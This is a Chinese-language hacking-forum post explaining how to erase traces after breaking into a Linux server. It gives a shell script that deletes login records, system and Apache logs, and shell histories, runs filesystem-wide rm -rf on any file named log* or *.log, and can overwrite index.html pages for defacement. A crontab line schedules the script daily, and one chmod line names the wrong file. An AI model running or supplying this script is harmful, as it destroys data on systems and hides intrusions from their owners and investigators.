linux--清除入侵日志
LINUX只不过是一个操作系统,只是大家不常用。用几天,掌握一下相关命令,那么入侵LINUX也就没什么神秘的了。因为溢出程序不是你写的,真正的难点在溢出部分,利用别人写好的溢出程序,你所做的就是 ./exp 然后就是 #root了。就这样简单的事情,我不知道还有什么优越感可言?
我曾经问过这位“牛人”,您入侵了LINUX后怎么办呢? 回答是:我都是ROOT了,放个ROOTKIT(还是被杀的),走人。
继续询问,那么怎么清除入侵痕迹呢? 回答是:不会,也用不着。
下面给大家讲解一下入侵LINUX后如何擦屁股的事。
方法很简单,就当是一个知识储备,或者需要的时候可以直接来天阳复制代码就可以了。
首先:
mkdir /tmp/logclear
cd /tmp/logclear
touch logclear.sh
chmod 777 qmailbakup .sh
vi logclear.sh
[ - ]CODE:
#!/bin/sh
i=$1
n=\"默认的index.html路径(如你想更改首页这里写首页路径,建议不要这样做,没意义)\"
for x in $n
do
find / -name $x* -exec cp $i {} \\;
done
n=\"/var/log/lastlog /var/log/wtmp /etc/wtmp /var/run/utmp
/etc/utmp /var/log /var/logs /var/adm /var/apache/log*
/usr/local/apache/log* /root/.bash_history /root/.ksh_history\"
rm -rf $n
n=\".bash_history .bash_logout log* *.log\"
for x in $n
do
find / -name $x -exec rm -rf {} \\;
done
下面使用crontab定时执行:
vi /etc/crontab
00 21 * * 0-6 /tmp/logclear/logclear.sh
这样每天晚上9:00执行清除程序。
当然不用每天,可以根据需要自己修改,如果你不常去此主机的话,就不用定时为每天了,只定时到指定时间后,擦屁股走人。
页:
[1]